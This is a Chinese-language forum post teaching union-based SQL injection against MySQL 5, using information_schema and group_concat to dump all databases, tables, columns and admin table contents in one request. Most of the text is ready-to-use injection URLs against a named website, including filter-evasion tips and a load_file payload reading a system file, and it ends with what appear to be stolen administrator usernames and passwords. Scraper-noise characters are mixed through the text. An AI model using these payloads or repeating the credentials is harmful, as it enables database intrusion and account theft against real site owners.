此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似* M7 g( z+ T- H+ S
但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人
. M; ~6 ], N# F. C( Y
6 \ C# L) `* @ d8 Z/ _- T! l8 R- O2 [2 l' x
优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入
% R7 T/ w9 ~- N7 S) t5 Z- V4 c
2 r9 t( x* h2 K4 s缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...2 j, u3 n/ ^3 E. y! i
) \9 F! M4 c \/ a: a
下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示( J3 ?% `& U1 q$ J1 {% d
在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等
- g( w4 L, D: c- H2 H* Z" P$ Q" i# h- G
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,177 [. L3 m4 K. A0 B: u! Z
. x9 D' y2 S( Q0 l& H5 K读出所有库:( ^. p( D, u7 ~ R- O$ M
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA8 I [$ \" K7 S6 l& k6 X7 o9 B
; l0 S1 Y1 Y$ T9 ^9 W
. z; B2 c5 L$ d1 X Z2 d8 m- t( G1 d- N& O' P8 n+ S' o% @. l4 t
读出所有表:3 \7 W% L g5 i5 l/ {! M
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()
4 i) E6 V7 Y! b* ^0 `4 z1 t/ J
, P* N. ]7 ]" t6 i' y" `读出所有表字段:0 p; P1 o' o2 C$ S0 \
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)1 [7 c( f7 E8 o8 m: G
*/ (97,100,109,105,110)为admin的ascii码 依次类推
9 m( L1 i) \# ]( I9 k8 R% z+ l5 v# a, A: h" q3 E
读出所有表字段里的内容:
0 v6 G8 U" v' n5 L8 H! r! E3 g' Chttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin
9 m" t Y5 J6 r! g0 L& _' q" b7 ~
$ z: k8 E( ]- w h0 Q. x
! J7 J! D' N$ R! T' O0 c0 A4 x: H; r( v q! Y" [! t& F- R
8 N% u2 Y+ B! h% K; `
, ?1 q) C; N/ k ^- l0 ^
3 k3 y- X0 m8 j7 W! Q- Ahttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23
1 ?0 v( c' L: d: c+ M' l V" {/ f/ U' X9 m
t* O0 i1 p, `- Z$ H% g3 P( c. v& {
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23- |* Y$ U q) }. G! j3 q& y2 d
3 V+ e; Y/ s6 ]; l% q, b5 W' |http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23
0 a/ o* @2 v0 \, B5 i
& T( ^9 V' \; }' f$ K7 i! q# G
! F0 [/ Z' B& |http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23
0 o1 x4 l. o. r$ w/ `' q. p! X* L1 q- u7 K: z: ^6 l
8 J; Q/ Y" y2 L! B webmaster:dzb521123,simlab:simadmin200432335 }5 |3 z) T! z2 A5 t
|
发表于 2012-9-13 16:37:34
收藏
支持
反对